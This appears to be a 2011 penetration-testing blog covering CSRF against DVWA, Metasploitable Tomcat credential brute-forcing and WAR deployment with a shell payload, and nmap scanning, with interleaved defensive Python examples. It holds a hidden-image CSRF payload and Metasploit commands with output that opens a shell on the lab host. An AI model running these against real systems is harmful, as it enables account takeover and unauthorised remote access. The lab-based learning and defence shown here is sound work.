Cross Site Request Forgery (CSRF) is a web-based vulnerability by which an attacker can send unauthorised commands to a site via an authenticated user. The attack forces the user to unwittingly send commands to the website by embedding malicious URLs in HTML that the target's browser then executes, for example by clicking a hyperlink or viewing an image that references the URL. Since the request comes from the authenticated user's browser, it can be very difficult to determine when a CSRF attack has occurred.

Consider the following HTTP request line (borrowed from DVWA):

GET /dvwa/vulnerabilities/csrf/?password_new=mynewpasswd&password_conf=mynewpasswd&Change=Change HTTP/1.1

This shows the parameters sent to the website in order to perform a password change on an account. Since the request above tells us which parameters must be sent in the URL, it is possible to construct a custom URL that changes the password, for example:

www.example.com/dvwa/vulnerabilities/csrf/?password_new=expl0ited&password_conf=expl0ited&Change=Change

Now that we have the URL, we need to get the admin to "launch" it. This is where CSRF comes into its own as a stealth attack: the target does not need to explicitly click a link in order to execute this request, since the URL can easily be hidden within some HTML, such as an image tag:

<img src="http://www.example.com/dvwa/vulnerabilities/csrf/?password_new=abcd&password_conf=abcd&Change=Change" alt="" width="1" height="1" border="0" />

Images are preferable to hyperlinks, since a hyperlink will redirect the user to the CSRF page, where they will see that a change has occurred (such as a confirmation page for the password change). By embedding the link as a 1×1 pixel image, as in the tag above, the malicious URL is still submitted to the website when the malicious web page or email is viewed, but no visual indicator is displayed to show that the action has taken place.

There are, however, caveats to this method, including:
- The target needs to be logged in to the site in order for the attack to work
- The site must not check the HTTP Referer header (a forged request will not carry the correct Referer, since it did not originate from the actual website)
- The target must be lured into executing the malicious URL

It is often assumed that only HTTP GET requests are vulnerable to CSRF, since only those allow the malicious URL to be constructed as above, but there are tools to perform CSRF attacks against HTTP POST requests as well. For example, the CSRF Redirector can be used to forge HTTP POST requests. Another converter can be found here.
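The caveats above are exactly the checks a site can enforce to defeat the forged image request. The following Python is an added example (not DVWA's code or anything from the original post) of a hardened password-change handler: it refuses GET, checks the Origin/Referer against the site's own origin, and requires a per-session anti-CSRF token that an attacker's page cannot obtain. SITE_ORIGIN, the plain-dict session and the header/form parameters are assumptions standing in for a real web framework.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed origin of the DVWA-style site being protected (placeholder, not a real deployment)
SITE_ORIGIN = "http://www.example.com"

def issue_csrf_token(session):
    """Synchronizer-token pattern: mint a random per-session token and keep it server-side.
    The legitimate password-change page embeds it as a hidden form field."""
    session["csrf_token"] = secrets.token_hex(16)
    return session["csrf_token"]

def change_password(session, method, headers, form):
    """Hardened handler for the password-change action from the post above.
    Returns (http_status, message). The session dict stands in for the cookie-bound server session."""
    # 1. A forged <img> can only issue GET; never change state on anything but POST.
    if method != "POST":
        return 405, "password change requires POST"
    # 2. Compare the Origin (or Referer as a fallback) with our own origin.
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return 403, "missing Origin/Referer"
    p = urlsplit(src)
    if "%s://%s" % (p.scheme, p.netloc) != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    # 3. The token only ever appears on the legitimate page, so an attacker's page cannot supply it.
    expected = session.get("csrf_token", "")
    supplied = str(form.get("csrf_token", ""))
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "invalid CSRF token"
    # 4. Only now apply the requested change.
    if not form.get("password_new") or form["password_new"] != form.get("password_conf"):
        return 400, "passwords do not match"
    session["password"] = form["password_new"]
    return 200, "password changed"

def demo():
    """Replay the forged <img> request from the post against the hardened handler, then a legitimate one."""
    session = {"password": "original"}
    token = issue_csrf_token(session)
    forged = change_password(session, "GET", {"Referer": "http://attacker.invalid/page.html"},
                             {"password_new": "abcd", "password_conf": "abcd", "Change": "Change"})
    legit = change_password(session, "POST", {"Origin": SITE_ORIGIN},
                            {"password_new": "mynewpasswd", "password_conf": "mynewpasswd",
                             "Change": "Change", "csrf_token": token})
    return forged, legit, session["password"]
```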

 

One of the simplest attacks to perform against the Metasploitable VM is against the Tomcat installation. This has been set up with weak credentials (tomcat:tomcat) and as such can easily be brute-forced and exploited.

The Metasploit scanner module tomcat_mgr_login can be run against your host; it will only take a few guesses to come across the correct login.

msf > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS metasploitable
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
msf auxiliary(tomcat_mgr_login) > exploit


[*] 10.0.0.33:8180 - Trying username:'tomcat' with password:'role1'
[-] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 10.0.0.33:8180 - Trying username:'tomcat' with password:'root'
[-] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 10.0.0.33:8180 - Trying username:'tomcat' with password:'tomcat'
[+] http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 10.0.0.33:8180 - Trying username:'both' with password:'admin'

Now that we have the credentials, it is possible to exploit the host through the Tomcat manager. jduck's Tomcat Manager Application Deployer (tomcat_mgr_deploy) deploys a WAR file containing a malicious JSP application that is then executed on the server. This can be used in conjunction with reverse shell payloads, for example, to spawn a session on the server.

msf > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set RHOST metasploitable
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
msf exploit(tomcat_mgr_deploy) > set PAYLOAD linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux X86"
[*] Uploading 1612 bytes as HJpy1H.war ...
[*] Executing /HJpy1H/EpKaNLsCQUUjo.jsp...
[*] Undeploying HJpy1H ...
[*] Sending stage (36 bytes) to metasploitable
[*] Command shell session 1 opened (10.0.0.11:39497 -> 10.0.0.33:4444) at 2010-05-19 11:53:12 -0500

We now have access to the Metasploitable host as the Tomcat user.

tomcat_mgr_deploy overview
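From the defender's side, the login guessing and WAR deployment above leave a recognisable trail in the Tomcat access log: a burst of 401 responses on /manager, a 200 for the same source immediately after, then a deployment request. The following Python is an added example (not part of the original post or of Metasploit) that parses constructed common-log-format lines and flags that sequence; the log lines, the deployment paths and the failure threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed Tomcat access-log lines in the common log format (not real log data)
SAMPLE_LOG = """\
10.0.0.11 - - [19/May/2010:11:52:58 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.11 - - [19/May/2010:11:52:59 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.11 - - [19/May/2010:11:53:00 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.11 - - [19/May/2010:11:53:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.11 - tomcat [19/May/2010:11:53:03 -0500] "GET /manager/html HTTP/1.1" 200 17890
10.0.0.11 - tomcat [19/May/2010:11:53:10 -0500] "PUT /manager/deploy?path=/HJpy1H HTTP/1.1" 200 56
10.0.0.11 - tomcat [19/May/2010:11:53:11 -0500] "GET /HJpy1H/EpKaNLsCQUUjo.jsp HTTP/1.1" 200 0
10.0.0.12 - - [19/May/2010:12:00:00 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.12 - admin [19/May/2010:12:00:05 -0500] "GET /manager/html HTTP/1.1" 200 17890
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

FAILED_LOGIN_THRESHOLD = 4   # assumed: 401s from one source before we call it guessing

def analyse(log_text, threshold=FAILED_LOGIN_THRESHOLD):
    """Return (source_ip, finding) tuples describing manager-application abuse patterns."""
    failures = defaultdict(int)   # 401 count per source address on /manager
    compromised = set()           # sources that logged in after exceeding the threshold
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m["path"].startswith("/manager"):
            continue
        ip, status = m["ip"], int(m["status"])
        if status == 401:
            failures[ip] += 1
            if failures[ip] == threshold:
                findings.append((ip, "manager login guessing (%d failures)" % threshold))
        elif status == 200 and failures[ip] >= threshold and ip not in compromised:
            compromised.add(ip)
            findings.append((ip, "successful manager login after guessing as '%s'" % m["user"]))
        # Deployments via the manager are always worth a look; tag those from a guessed account.
        if m["method"] in ("PUT", "POST") and ("/manager/deploy" in m["path"] or "/manager/html/upload" in m["path"]):
            tag = " by guessed account" if ip in compromised else ""
            findings.append((ip, "application deployed via manager%s: %s" % (tag, m["path"])))
    return findings
```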

 

In order to be able to successfully penetrate this system, we need to identify what system we are dealing with. The first thing to do is a port scan, which will identify which ports the system has open. With the right tool and parameters it is also possible to find out what is behind each port, and even which version of the software is running. This information is important, since vulnerabilities can change, appear or disappear between versions of the same software package.

Important: if you are using VMware, set each VM to use NAT networking to ensure they have separate IPs.

I am using nmap to perform the port scan of the host; since I am lazy and not concerned with stealth, I am going to use the -A switch to enable OS and version detection in one go.

Warning: you will need to know the IP of the Metasploitable VM in order to port scan it. Run the ifconfig command to gather this.

nmap -A 192.168.9.129
-- SNIP --
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
| mysql-info: Protocol: 10
| Version: 5.0.51a-3ubuntu5
| Thread ID: 9
| Some Capabilities: Connect with DB, Compress, SSL, Transactions, Secure Connection
| Status: Autocommit
|_Salt: {hu6HJzG5pXF7!>UoP"V
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/5.5
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-favicon: Apache Tomcat
MAC Address: 00:0C:29:17:D7:24 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.31
Network Distance: 1 hop
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux
-- SNIP --

As can be seen from the output, the scan has provided us with plenty of information. We now know which services are running, on which ports and at what versions. From here it is possible to go into Metasploit and begin searching for related exploits to launch against the target host.
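The same scan output is just as useful on the defending side as a service inventory. The following Python is an added example (not from the original post or from nmap) that parses the port table from nmap's normal output, attaching the NSE detail lines to the port they belong to, and then flags what an asset owner would want to review: legacy cleartext services, open ports nmap could not fingerprint, and the risky TRACE method the script output above mentions. The sample input is copied from the scan above; the list of cleartext services is an assumption.

```python
import re

# Port-table lines copied from the nmap -A output above (NSE "|" detail lines included)
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp open telnet Linux telnetd
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
"""

PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$")

# Legacy cleartext protocols a defender wants flagged regardless of version (assumed list)
CLEARTEXT_SERVICES = {"ftp", "telnet"}

def parse_ports(text):
    """Turn nmap's normal-output port table into dicts, attaching NSE detail lines to their port."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["port"] = int(rec["port"])
            rec["version"] = rec["version"] or ""
            rec["details"] = []
            services.append(rec)
        elif line.startswith("|") and services:
            services[-1]["details"].append(line.lstrip("|_ ").strip())
    return services

def review(services):
    """Return (port, reason) pairs: cleartext services, unfingerprinted open ports, risky HTTP methods."""
    findings = []
    for s in services:
        if s["state"] != "open":
            continue
        if s["service"] in CLEARTEXT_SERVICES:
            findings.append((s["port"], "cleartext protocol: %s" % s["service"]))
        if not s["version"]:
            findings.append((s["port"], "no version fingerprint for %s" % s["service"]))
        for d in s["details"]:
            if "risky methods" in d.lower():
                findings.append((s["port"], d))
    return findings
```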

 

Whilst looking for a way to sharpen my penetration testing skills, I came across "Metasploitable". This is an Ubuntu 8.04 distribution served up as a VMware appliance and is packed with out-of-date and vulnerable software that can be exploited, including:

  • Apache Tomcat 5.5 (with weak credentials)
  • Apache JServ
  • MySQL 5.0.51a-3ubuntu5
  • PostgreSQL DB 8.3.x
  • Postfix SMTPd
  • ProFTPD 1.3.1
  • Distcc
  • Tikiwiki
  • Twiki

And much more...

You can download a torrent of this from here or as a direct HTTP download from the customer centre here

Source: Metasploit Blog

 

Welcome to Eithernet, a place which (I hope) will soon be filled with various tutorials and articles relating to networking, security and penetration testing topics. I have set this up to help record the knowledge I have gained along my journey into this field, which I wish to share with a wider audience.

© 2011 Eithernet Suffusion theme by Sayontan Sinha